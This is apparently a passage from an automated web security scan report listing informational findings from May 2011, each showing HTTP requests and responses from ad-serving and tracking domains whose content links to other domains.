Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://a1.interclick.com/getInPageJS.aspx?a=51&b=50020&cid=633862074462683028"> <\/script>
...[SNIP]...

17.18. http://finance.fox8live.com/inergize.wvue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /inergize.wvue?Module=snapshot2&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:36:57 GMT
Expires: Mon, 09 May 2011 15:37:57 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 40681

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
'head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);

var tcdacmd="dt";
document.write('<script src="http://an.tacoda.net/an/18181/slf.js"></script>
...[SNIP]...

17.19. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 09 May 2011 15:35:38 GMT
Expires: Mon, 09 May 2011 15:35:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1835

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "Groupon" c/o "Groupon", segment: 'Subscription Landing Page' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=39531&partnerID=226&clientID=4716&key=segment" width="1" height="1" />
<!-- End of pixel tag --><img src="http://idcs.interclick.com/Segment.aspx?sid=073b4702-bd65-4b9a-ba5b-edcd599ebdea"/><img src="http://pixel.quantserve.com/pixel/p-f5C1tdAD-3ZQ-.gif?labels=_fp.event.Sub+LP" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><img
src="http://ad.doubleclick.net/activity;src=2895566;dcnet=6457;boom=44553;sz=1x1;ord=429162006?"
width="1" height="1" border="0" alt="">
...[SNIP]...
<!-- Advertiser 'Groupon', Include user in segment 'Groupon Remarketing Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1020641&t=2" width="1" height="1" />
<!-- End of segment tag --><img src="http://at.amgdgt.com/ads/?t=pp&px=13933&rnd=[cachebuster]" width="1" height="1" border="0"/>
<img
src="http://ad.doubleclick.net/activity;src=2895566;dcnet=6457;boom=44556;sz=1x1;ord=429162006?"
width="1" height="1" border="0" alt="">
...[SNIP]...
<img
src="http://ad.doubleclick.net/activity;src=2895566;dcnet=6457;boom=44554;sz=1x1;ord=429162006?"
width="1" height="1" border="0" alt=""><img height="1" width="1" src="http://tags.bluekai.com/site/3869"></body>
...[SNIP]...

17.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=www.usatoday.com/weather/floods_Top728x90;cookie=info;loc=100;target=_blank;grp=95308;misc=1304955413986;noperf=1;size=728x90;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;kvtitle=Levee-blasted-along-Mississippi-River-to-spare-Cairo-Ill---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; JEB2=4DC7E58B6E651A440C6EAF39F000181A; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 942

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("auto") != -1) rubSect = 7208;
else if (window.location.pathname.indexOf("mo
...[SNIP]...
ubSect = 7106;
else if (window.location.pathname.indexOf("tech") != -1) rubSect = 7107;
else if (window.location.pathname.indexOf("weather") != -1) rubSect = 7108;
else rubSect = 7102;
document.write('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...

17.21. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=www.usatoday.com/weather/floods_Spon1;cookie=info;loc=100;target=_blank;grp=95308;misc=1304955413985;noperf=1;size=88x31;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;kvtitle=Levee-blasted-along-Mississippi-River-to-spare-Cairo-Ill---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; JEB2=4DC7E58B6E651A440C6EAF39F000181A; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 319

document.write('<a href="http://gannett.gcion.com/?adlink/5111/778079/0/13/AdId=-3;BnId=0;itime=955413808;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/usga13_88x31.gif" border=0 alt="gannett.com" width="88" height="31"></a>
...[SNIP]...

17.22. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=www.usatoday.com/weather/floods_FixedPanel;cookie=info;loc=100;target=_blank;grp=95308;misc=1304955413987;noperf=1;size=336x700;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;kvtitle=Levee-blasted-along-Mississippi-River-to-spare-Cairo-Ill---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; JEB2=4DC7E58B6E651A440C6EAF39F000181A; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 324

document.write('<a href="http://gannett.gcion.com/?adlink/5111/1126918/0/2555/AdId=-3;BnId=0;itime=955415450;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/AT2555_336x700.gif" border=0 alt="AdTech Ad" width="336" height="700"></a>
...[SNIP]...

17.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 09 May 2011 15:37:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5101

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CP3Pgoj_hfrXvQEQrAIY-gEyCFMXXH_f_4KP">
...[SNIP]...
54105195%2526ccsurl%253D%2524%2524http://www.fedex.com/us/office/marketing/signsbanners/index.html%253FHBX_CMP%253DKNC-REM297%2526HBX_PK%253Dsmall%252520business%252520marketing%252520ideas%2524%2524"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CP3Pgoj_hfrXvQEQrAIY-gEyCFMXXH_f_4KP" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB3ytHQwrITbnTGsK0sQfI-p2oD4Oo6ZkC84XZxBzAjbcBgMLeAxABGAEggqrzDjgAUMe1jrT______wFgyYaFiYikhBCyARN3d3cudGhlcmVwdWJsaWMuY29tugEKMzAweDI1MF9hc8gBBNoBIGh0dHA6Ly93d3cudGhlcmVwdWJsaWMuY29tL2hvbWUv4AECuAIYyAKLlosbqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ%26num%3D1%26sig%3DAGiWqtyE-9bnbWsG0dSOOWYYyQWe3_HLqQ%26client%3Dca-pub-8560941387472259%26adurl%3Dhttp://bs.serving-sys.com/BurstingPipe/AdServer.bs%253Fcn%253Dccs%2526ebcmp%253D10041837%2526ebkw%253D21777157%2526advid%253D30544%2526ebag%253D471087%2526sead%253D7554105195%2526ccsurl%253D%2524%2524http://www.fedex.com/us/office/marketing/signsbanners/index.html%253FHBX_CMP%253DKNC-REM297%2526HBX_PK%253Dsmall%252520business%252520marketing%252520ideas%2524%2524" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.therepublic.com/home/%26hl%3Den%26client%3Dca-pub-8560941387472259%26adU%3Dfedex.com/banners%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNESFKZ5ah0h73AmAujdy-pKKJu5xQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

17.24. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-49643098_1304955489,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-49643098_1304955489%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-cm.weath_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D595286%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.weath_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Dmm.ag1%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.am1%3Bbtg%3Dmm.aq1%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYAiACKAIw-pSg7gQQ-pSg7gQYAQ..; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb976848=5_[r^kI/7Zw[-!!0nf8M`P4+Q?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP-kewMldWkJ_SsYda6b2ziV6CshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA7w4BAgUCAAUAAAAAMiaD7wAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955522%29%3Buf%28%27c%27%2C+61473%2C+1304955522%29%3Buf%28%27r%27%2C+272040%2C+1304955522%29%3Bppv%287166%2C+%279169991150143020777%27%2C+1304955522%2C+1336491522%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:38:34 GMT
Content-Length: 756

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-49643098_1304955489,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-cm.weath
...[SNIP]...
</scr'+'ipt>');document.write('<script type="text/javascript" src="http://ev.ib-ibi.com/image.sbix?go=2269&pid=32&xid=2724386019227846218"></script>
...[SNIP]...

17.25. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-65201734_1304955420,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-65201734_1304955420%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D637150%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
